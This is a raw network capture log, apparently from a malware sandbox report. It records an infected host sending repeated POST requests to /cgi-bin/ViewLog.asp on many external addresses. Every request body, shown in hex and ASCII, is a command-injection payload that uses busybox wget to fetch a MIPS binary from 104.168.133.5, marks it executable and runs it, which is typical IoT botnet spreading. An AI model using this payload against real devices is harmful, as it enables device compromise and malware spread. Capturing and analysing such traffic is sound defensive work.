                                              Nov 23, 2023 05:15:55.142951965 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:13.574168921 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:50.436616898 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              129192.168.2.144244631.136.185.878080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:37.182049036 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:40.295599937 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:46.439256907 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:58.470760107 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:23.813700914 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:12.963604927 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              130192.168.2.144486831.136.148.1328080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:37.185292006 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:40.295599937 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:46.439273119 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:58.470748901 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:23.813700914 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:17:12.963604927 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              131192.168.2.145523231.217.247.738080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:37.208090067 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              132192.168.2.143500294.121.137.478080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:37.209829092 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              133192.168.2.143523485.69.26.368080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:37.359963894 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:37.927638054 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:39.079616070 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:41.575541019 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:46.183258057 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:55.398921967 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:13.574115992 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:50.436630964 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              134192.168.2.145210895.169.206.1928080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:37.420017958 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:38.075936079 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:38.290323973 CET278INHTTP/1.1 403 Forbidden
                                              Content-Type: text/html; charset=utf-8
                                              Content-Length: 106
                                              Connection: close
